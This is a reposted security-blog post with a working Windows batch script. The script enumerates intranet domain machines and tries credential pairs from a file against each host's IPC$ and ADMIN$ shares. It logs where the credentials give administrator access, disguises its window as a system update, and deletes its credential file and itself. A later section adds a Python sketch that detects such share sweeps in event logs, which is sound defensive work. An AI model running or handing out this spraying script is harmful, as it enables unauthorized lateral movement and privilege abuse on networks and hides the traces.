[Bat] Scanning the intranet for machines where specified users can obtain administrative privileges

admin 2021-04-03 19:04:27

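A BAT script that automatically obtains the list of machines on the intranet, checks which ones are online, scans them, and records the results to a log.......

It automatically corrects the domain name and automatically determines the domain... enough talk, here is the code.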

=========================user.txt=========================
Format:
domainusername password
username password

=========================getadmin.bat=========================
@echo off
setlocal ENABLEDELAYEDEXPANSION
title Updating System ......
set log=%systemroot%result.txt
set usertxt=%systemroot%user.txt
if not exist !usertxt! (
echo !usertxt! not exist
goto :eof )
set Dline=0
set Totacmp=0
set AllComputers=0
set online=0
set offline=0
set splitbig=echo =====================================================================
set splitsmall=echo ---------------------------------------------------
set nullline=echo.
echo Current Time: %date% %time%
echo UserDomain: %USERDOMAIN%
echo Current ComputerName: %computername%
echo Current UserProfile: %UserProfile%
%splitsmall%
%nullline%
echo c:^^>net view ^/domain
net view /domain
%splitbig%
@FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成功" /v ^|find "The command completed successfully." /v ^|find "命令成功完成" /v ^|find "--" /v ^|find "Domain" /v ^|find "" /v ^|find "コマンドは正常に終了しました" /v /i`) do (
%nullline%
set /a Dline+=1
set /a Totacmp=0
set online=0
set offline=0
set dmain=%%J
@echo c:^^>net view ^/domain:%%J ^/^/The !Dline!th Domain
%splitsmall%
@FOR /F "usebackq eol=; delims=, " %%i in (`net view /domain:%%J ^|findstr ""`) DO (
set /a Totacmp+=1
set temp=0
@FOR /F "usebackq eol=; tokens=1,2,3* delims=" %%a in (`echo %%i`) do (
set ifonline=OffLine
set Reply=unno
set Pinging=unno
set hostname=%%a
set hstname=%%a
set ip=unno
for /f "delims=" %%i in ('ping -a -n 1 -w 100 %%a') do (
for %%b in (%%i) do if defined %%b (
if %%b == Reply (
set ifonline=OnLine
set /a online+=1
set temp=1
)
if %%b == Pinging (
FOR /F "tokens=1,2,3,4* usebackq delims=: " %%K IN ('echo %%i') do (
set ip=%%N
)
)
)
)
if /i !temp! EQU 0 (
@echo %%a !ifonline!
) else (
echo !hstname! !ip! !ifonline!
FOR /F "eol=; tokens=1,2,3,4* delims=, " %%B in (!usertxt!) do (
set user=%%B
set pass=%%C
echo %%B | find ""
IF NOT errorlevel 1 (
set user=%%B
) else (
set tempuser=!dmain!!user!
echo net use !hstname!ipc$ "!pass!" /user:"!tempuser!"
@net use !hstname!ipc$ "!pass!" /user:"!tempuser!"
IF NOT errorlevel 1 (
echo dir !hstname!admin$
@dir !hstname!admin$
IF NOT errorlevel 1 (
echo !hstname! !tempuser! !pass! !ip! !dmain! >> !log!
%splitsmall%
)
net use !hstname!ipc$ /del
)
set user=!hostname!!user!
)
echo net use !hstname!ipc$ "!pass!" /user:"!user!"
@net use !hstname!ipc$ "!pass!" /user:"!user!"
IF NOT errorlevel 1 (
echo dir !hstname!admin$
@dir !hstname!admin$
IF NOT errorlevel 1 (
echo !hstname! !user! !pass! !ip! !dmain! >> !log!
%splitsmall%
)
net use !hstname!ipc$ /del
)
)
net use * /del /y
)
)
)
%splitsmall%
set /a offline =Totacmp -online
echo Computers in Current Domain Status :
%splitsmall%
echo Total Computers : !Totacmp!
echo Online Computers : !online!
echo Offline Computers : !offline!
set /a AllComputers+=!Totacmp!
%splitbig%
%nullline%
)
echo Total Domains is: !Dline!
echo All Computers In All Domain is: !AllComputers!
del !usertxt!
del %0
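
From the defender's side, as an added example that is not part of the original post: the script connects to IPC$ and then lists ADMIN$ on every online host from one machine, which appears as Security event 5140 on each target when file-share auditing is enabled. The sketch below flags a source address that reaches IPC$ on several hosts within a short window; the sample records, the tuple layout and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 5140 records ("A network share object
# was accessed"), reduced to: time, logging host, source address, account, share.
SAMPLE_EVENTS = [
    ("2021-04-03 19:00:01", "WS01", "10.0.0.50", r"CORP\alice", r"\\*\IPC$"),
    ("2021-04-03 19:00:03", "WS02", "10.0.0.50", r"CORP\alice", r"\\*\IPC$"),
    ("2021-04-03 19:00:03", "WS02", "10.0.0.50", r"CORP\alice", r"\\*\ADMIN$"),
    ("2021-04-03 19:00:06", "WS03", "10.0.0.50", r"CORP\alice", r"\\*\IPC$"),
    ("2021-04-03 19:00:09", "WS04", "10.0.0.50", r"WS04\alice", r"\\*\IPC$"),
    ("2021-04-03 19:00:09", "WS04", "10.0.0.50", r"WS04\alice", r"\\*\ADMIN$"),
    ("2021-04-03 10:15:00", "WS01", "10.0.0.7", r"CORP\helpdesk", r"\\*\IPC$"),
    ("2021-04-03 10:15:02", "WS01", "10.0.0.7", r"CORP\helpdesk", r"\\*\ADMIN$"),
    ("2021-04-03 09:00:00", "WS01", "10.0.0.9", r"CORP\bob", r"\\*\IPC$"),
    ("2021-04-03 11:00:00", "WS02", "10.0.0.9", r"CORP\bob", r"\\*\IPC$"),
    ("2021-04-03 14:00:00", "WS03", "10.0.0.9", r"CORP\bob", r"\\*\IPC$"),
]

def find_share_sweeps(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {source: (hosts whose IPC$ was reached, hosts whose ADMIN$ was
    opened)} for sources that hit IPC$ on >= min_hosts hosts inside one window."""
    by_src = defaultdict(list)
    for ts, host, src, _account, share in events:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        by_src[src].append((when, host, share.upper()))
    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Slide the window start forward until it spans at most `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            burst = rows[start:end + 1]
            ipc = {h for _, h, s in burst if s.endswith("IPC$")}
            if len(ipc) >= min_hosts:
                # ADMIN$ opens in the same burst mean the account is an
                # administrator on that host: treat those hosts as priority.
                adm = {h for _, h, s in burst if s.endswith("ADMIN$")}
                seen_ipc, seen_adm = findings.setdefault(src, (set(), set()))
                seen_ipc |= ipc
                seen_adm |= adm
    return {s: (sorted(i), sorted(a)) for s, (i, a) in findings.items()}

if __name__ == "__main__":
    for src, (ipc, adm) in find_share_sweeps(SAMPLE_EVENTS).items():
        print(f"{src}: IPC$ on {ipc}; ADMIN$ opened on {adm}")
```

Hosts returned in the second list are the ones where the sprayed account actually holds administrator rights, so they are the first candidates for credential rotation and review.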

Source: lcx.cc: [Bat] Scanning the intranet for machines where specified users can obtain administrative privileges

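  • This article was published on 2021-04-03 19:04:27
  • When reposting, please keep the link to this article (CN-SEC Chinese site: thanks to the original author for the hard work):
                   [Bat] Scanning the intranet for machines where specified users can obtain administrative privileges http://cn-sec.com/archives/319796.html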
